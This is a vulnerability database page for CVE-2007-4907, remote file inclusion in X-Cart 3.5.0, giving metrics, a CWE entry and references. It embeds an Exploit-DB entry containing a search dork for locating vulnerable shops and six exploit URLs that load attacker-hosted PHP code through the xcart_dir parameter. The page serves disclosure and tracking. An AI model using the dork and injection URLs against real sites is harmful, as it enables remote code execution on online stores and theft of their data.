CVE-2007-4907 : Detail

CVE-2007-4907

Code Injection
A03-Injection
7.93%V3
Network
2007-09-17
14h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple PHP remote file inclusion vulnerabilities in X-Cart allow remote attackers to execute arbitrary PHP code via a URL in the xcart_dir parameter to (1) config.php, (2) prepare.php, (3) smarty.php, (4) customer/product.php, (5) provider/auth.php, and (6) admin/auth.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4396

Publication date : 2007-09-10 22h00 +00:00
Author : aLiiF
EDB Verified : Yes

## xCart Remote file inclusion ## ## Download script : http://www.x-cart.com// ## Discovered By : aLiiF a.k.a [arif] @debuteam 07/09/2007 ## HomePage : http://www.debuteam.net// ## Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0n_g0ku^ Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey s3ng0k home_edition Holong home_edition2001 th0nk Scr3W_W0rm jayoes and aLL @Debutem @Mildnet ########### ########### ## ## ## 333 444555 HH HH KK K ## ## 333 3332222 444 555 1133311 HH HH KK K ## ## 333 33322222 444 55 11 11 HH HH #### 00000 KKKK ## ## 333 333 22 444 55 11 11 HHaaHH ## 00 KKK ## ## 333 333 22 444 55 11 11 HH HH ##### 00 KKKK ## ## 333 333 22 444 555 11 11 HH HH # ## 00 KK K ## ## 333 333 22 444555 1133311 HH HH ##### 00000 KK K ## ## ## ########## ########## /*****************************************************************************\ +-----------------------------------------------------------------------------+ | X-Cart | | Copyright (c) 2001-2004 Ruslan R. Fazliev <rrf@rrf.ru> | | All rights reserved. | +-----------------------------------------------------------------------------+ # # $Id: config.php,v 1.297.2.9 2004/02/05 12:25:43 mclap Exp $ # # Global definitions & common functions # @include $xcart_dir."/prepare.php"; # # Create Smarty object # if (!@include $xcart_dir."/smarty.php") { ################################################################################# ## Dork : "X-CART. Powerful PHP shopping cart software" ## ## ## =-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-= ## http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]? ## http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]? ## http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]? ## http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]? ## http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]? ## http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]? =================================================================== ## Contack person : aliif@debuteam.net ## ViVa Debuteam !!! # milw0rm.com [2007-09-11]

Products Mentioned

Configuraton 0

Qualiteam>>X-cart >> Version 3.5.0

References

http://osvdb.org/38977
Tags : vdb-entry, x_refsource_OSVDB
http://osvdb.org/38976
Tags : vdb-entry, x_refsource_OSVDB
https://www.exploit-db.com/exploits/4396
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/38974
Tags : vdb-entry, x_refsource_OSVDB
http://osvdb.org/38972
Tags : vdb-entry, x_refsource_OSVDB
http://osvdb.org/38973
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/25637
Tags : vdb-entry, x_refsource_BID